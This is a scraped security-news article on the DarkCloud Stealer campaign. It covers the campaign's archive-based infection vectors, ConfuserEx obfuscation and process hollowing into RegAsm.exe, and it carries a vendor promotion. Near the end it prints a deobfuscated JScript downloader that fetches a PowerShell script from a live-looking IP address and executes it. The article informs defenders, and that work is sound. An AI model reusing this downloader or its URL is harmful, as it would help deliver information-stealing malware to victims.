A sophisticated information-stealing malware campaign has emerged, utilizing advanced obfuscation techniques and multiple infection vectors to evade traditional security controls.<\/p>\n
The DarkCloud Stealer, first documented in recent threat intelligence reports, represents a significant evolution in cybercriminal tactics, employing a complex multi-stage delivery mechanism that begins with seemingly innocuous archive files and culminates in the deployment of a heavily obfuscated Visual Basic 6 payload.<\/p>\n
The malware<\/a> operators have developed three distinct infection pathways, each designed to maximize the likelihood of successful system compromise.<\/p>\n These include JavaScript-initiated chains that download PowerShell scripts, 7Z archives containing Windows Script Files with obfuscated JScript code, and TAR archives that serve as alternative entry points.<\/p>\n Each vector demonstrates sophisticated social engineering<\/a>, often masquerading as legitimate business documents or software updates to bypass user suspicion.<\/p>\n Recent campaigns observed since April 2025 indicate the threat actors have significantly refined their approach, moving away from previously documented AutoIt-based implementations toward more complex .NET-based obfuscation frameworks.<\/p>\n Palo Alto Networks researchers identified<\/a> this shift as part of a broader trend among cybercriminals to adopt enterprise-grade development tools for malicious purposes, making detection and analysis considerably more challenging for security teams.<\/p>\n The malware\u2019s impact extends beyond traditional data theft, incorporating advanced persistence mechanisms and anti-analysis features that allow it to operate undetected for extended periods.<\/p>\n The campaign\u2019s infrastructure, including command-and-control servers hosting multiple malicious PowerShell scripts, suggests a well-resourced operation with significant planning and development investment.<\/p>\n The technical sophistication of DarkCloud Stealer<\/a> becomes apparent in its implementation of ConfuserEx-based obfuscation, a legitimate .NET application protector repurposed for malicious use.<\/p>\n The malware employs multiple layers of protection including anti-tampering measures, symbol renaming, and control flow obfuscation that transforms readable code into incomprehensible instruction sequences.<\/p>\n The deobfuscated JavaScript downloader reveals the initial infection mechanism:-<\/p>\n This script downloads PowerShell payloads from open directory servers, creating randomly named files in the system\u2019s temporary directory.<\/p>\n The subsequent PowerShell script contains Base64-encoded and AES-encrypted data that, when decrypted, reveals another executable protected by ConfuserEx\u2019s anti-tampering features.<\/p>\n The final stage employs process hollowing, injecting the decrypted VB6 payload named \u201cholographies.exe\u201d into RegAsm.exe, a legitimate .NET Framework utility.<\/p>\n This technique allows the malware to execute within the context of a trusted process, effectively bypassing many endpoint security solutions<\/a>.<\/p>\n Critical strings within the payload utilize RC4 stream cipher encryption with unique keys, further complicating static analysis efforts and demonstrating the authors\u2019 commitment to evasion.<\/p>\n Equip your SOC with full access to the latest threat data from\u00a0ANY.RUN TI Lookup<\/strong>\u00a0that can Improve incident response ->\u00a0Get 14-day\u00a0Free\u00a0Trial<\/a><\/strong><\/p>\n The post DarkCloud Stealer Employs New Infection Chain and ConfuserEx-Based Obfuscation<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nConfuserEx Obfuscation and Process Injection Mechanics<\/strong><\/h2>\n
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgaZCivFIUAmBzkznCGTFnhBHeyNDZOHYQ-lsGGROtn33LvGkAdde_BpU-jkf4JrZ3nbe98GcurCV_F1p7Ehu_HV1NYx0v-po8YoRYMK8eIGtOYj2yJXql372ABxlJHtLbnxBfTCSdQwaNkUM2dCbrhdB85p0Fz362Dt7_i3GUlJj9G91Q7XebQXbQDpHQ\/s16000\/Infection%2520chain%2520of%2520recent%2520DarkCloud%2520attacks%2520%28Source%2520-%2520Palo%2520Alto%2520Networks%29.webp?ssl=1\")
var rDFG = \"C:\\Temp\\\" + RandomName() + \".ps1\";\nvar fso = new ActiveXObject(\"Scripting.FileSystemObject\");\nvar shell = new ActiveXObject(\"WScript.Shell\");\nvar http = new ActiveXObject('MSXML2.XMLHTTP');\n\nif (Dwnld(\"http:\/\/176.65.142.190\/Blackyy\/kay.ps1\", rDFG)) {\n ExePSh(rDFG);\n}<\/code><\/pre>\n